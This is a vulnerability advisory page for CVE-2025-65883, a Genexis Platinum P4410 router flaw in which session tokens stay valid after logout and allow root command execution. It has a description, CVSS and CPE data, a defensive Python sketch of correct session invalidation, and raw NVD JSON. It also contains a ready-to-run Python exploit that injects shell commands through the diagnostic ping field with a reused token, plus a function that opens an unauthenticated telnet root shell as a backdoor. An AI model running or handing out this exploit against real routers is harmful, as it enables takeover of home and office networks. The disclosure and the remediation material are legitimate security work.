Security Vulnerability Report
CVE-2025-65883 CVSS 8.4 HIGH

Published: 2025-12-04 20:16:20
Last Modified: 2025-12-23 00:22:22

Description

A vulnerability has been identified in Genexis Platinum P4410 router (Firmware P4410-V2-1.41) that allows a local network attacker to achieve Remote Code Execution (RCE) with root privileges. The issue occurs due to improper session invalidation after administrator logout. When an administrator logs out, the session token remains valid. An attacker on the local network can reuse this stale token to send crafted requests via the router’s diagnostic endpoint, resulting in command execution as root.
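
The root cause described above (a session that stays valid after logout, CWE-613), as an added example that is not code from the advisory or from the router firmware: a minimal server-side session table contrasting a logout that only clears the browser cookie with one that deletes the server record. `SessionStore`, its methods and `stale_token_accepted` are hypothetical names; the `SESSIONID` cookie name follows the PoC on this page.

```python
import secrets
import time


class SessionStore:
    """Server-side session table: a token is valid only while it has a row here."""

    def __init__(self, idle_timeout=300, clock=time.monotonic):
        self._sessions = {}            # token -> (user, last_seen)
        self._idle_timeout = idle_timeout
        self._clock = clock

    def login(self, user):
        token = secrets.token_urlsafe(32)
        self._sessions[token] = (user, self._clock())
        return token

    def logout_cookie_only(self, token):
        """Flawed logout (assumed model of the bug): the browser is told to
        drop the cookie, but the server-side record is left in place."""
        return {"Set-Cookie": "SESSIONID=; Max-Age=0"}

    def logout(self, token):
        """Hardened logout: delete the server-side record, then clear the cookie."""
        self._sessions.pop(token, None)
        return {"Set-Cookie": "SESSIONID=; Max-Age=0"}

    def authorize(self, token):
        """Return the user for a live token, or None. Idle sessions are expired."""
        entry = self._sessions.get(token)
        if entry is None:
            return None
        user, last_seen = entry
        now = self._clock()
        if now - last_seen > self._idle_timeout:
            del self._sessions[token]   # defence in depth if logout never happens
            return None
        self._sessions[token] = (user, now)
        return user


def stale_token_accepted(logout_method_name):
    """Log in, log out with the named method, then present the old token again."""
    store = SessionStore()
    token = store.login("admin")
    getattr(store, logout_method_name)(token)
    return store.authorize(token) is not None
```

Every privileged handler, the diagnostic endpoint included, has to go through the same `authorize` lookup for the logout to take effect.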

CVSS Details

CVSS Score: 8.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:genexis:platinum_4410_firmware:p4410-v2-1.41:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:genexis:platinum_4410:-:*:*:*:*:*:*:* - NOT VULNERABLE
Genexis Platinum P4410 Firmware P4410-V2-1.41

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-65883 PoC - Genexis Platinum P4410 Session Token Reuse RCE
Note: This PoC is for educational and authorized testing purposes only.
"""

import requests
import sys
import re


def exploit_session_reuse(target_ip, session_token, command):
    """
    Exploit improper session invalidation to execute commands as root

    Args:
        target_ip: Router's IP address
        session_token: Valid session token (may be stale)
        command: Command to execute on the router
    """
    # Diagnostic endpoint typically accessible at /diagnostic.htm or similar
    url = f"http://{target_ip}/diagnostic.htm"

    headers = {
        'Cookie': f'SESSIONID={session_token}',
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (compatible; Router-Exploit-Test/1.0)'
    }

    # Payload structure depends on specific diagnostic functionality
    # Common injection points: ping_host, traceroute_target, dns_query
    data = {
        'action': 'ping',
        'ping_host': f';{command};#',  # Command injection
        'count': '1'
    }

    try:
        response = requests.post(url, headers=headers, data=data, timeout=10)
        if response.status_code == 200:
            print(f"[+] Command executed successfully")
            print(f"[*] Response:\n{response.text}")
            return True
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False


def enable_telnet(target_ip, session_token):
    """
    Enable Telnet service as a persistent backdoor
    """
    command = "busybox telnetd -p 23 -l /bin/sh"
    return exploit_session_reuse(target_ip, session_token, command)


def main():
    if len(sys.argv) < 4:
        print("Usage: python3 cve-2025-65883.py <router_ip> <session_token> <command>")
        print("Example: python3 cve-2025-65883.py 192.168.1.1 ABC123DEF456 'id'")
        sys.exit(1)

    target_ip = sys.argv[1]
    session_token = sys.argv[2]
    command = sys.argv[3]

    print(f"[*] Targeting {target_ip} with session token: {session_token}")
    print(f"[*] Executing command: {command}")

    exploit_session_reuse(target_ip, session_token, command)


if __name__ == "__main__":
    main()
```

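References

https://0xw41th.medium.com/my-first-cve-cve-2025-65883-remote-code-execution-in-a-genexis-router-0c35749a99bd (Exploit, Third Party Advisory)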

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65883", "sourceIdentifier": "[email protected]", "published": "2025-12-04T20:16:19.770", "lastModified": "2025-12-23T00:22:22.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in Genexis Platinum P4410 router (Firmware P4410-V2–1.41) that allows a local network attacker to achieve Remote Code Execution (RCE) with root privileges. The issue occurs due to improper session invalidation after administrator logout. When an administrator logs out, the session token remains valid. An attacker on the local network can reuse this stale token to send crafted requests via the router’s diagnostic endpoint, resulting in command execution as root."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:genexis:platinum_4410_firmware:p4410-v2-1.41:*:*:*:*:*:*:*", "matchCriteriaId": "5DA36573-1FE6-457C-886A-1D8F60D40890"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:genexis:platinum_4410:-:*:*:*:*:*:*:*", "matchCriteriaId": "7B251415-2EA1-4887-90C9-44231233138C"}]}]}], "references": [{"url": "https://0xw41th.medium.com/my-first-cve-cve-2025-65883-remote-code-execution-in-a-genexis-router-0c35749a99bd", 
"source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}